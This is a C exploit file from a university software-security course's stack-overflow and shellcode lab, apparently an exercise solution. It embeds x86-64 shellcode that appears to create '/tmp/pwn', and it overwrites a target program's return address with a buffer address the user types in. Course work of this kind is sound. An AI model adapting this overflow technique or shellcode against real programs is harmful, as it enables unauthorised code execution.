cours/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c

#include <stdlib.h>
#include <stdio.h>

unsigned char exploit[1024] = {
0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
};

int main(void) {
	int i;
	void **exploit_ptr = (void*) &exploit;
	void *ptr;

	fprintf(stderr,"Type the buf address printed by anodin\n");
	scanf("%p", &ptr);

	// écraser l'adresse de retour
	for (i = 0; i < 8; i++)
	 	exploit_ptr[64/sizeof(void*)+i] = ptr;
	
    for (i=0;i<sizeof(exploit);i++)
		putchar(exploit[i]);    

	for (i=0;i<8192;i++)
	 	putchar('\n');

	fflush(stdout);

	return 0;
}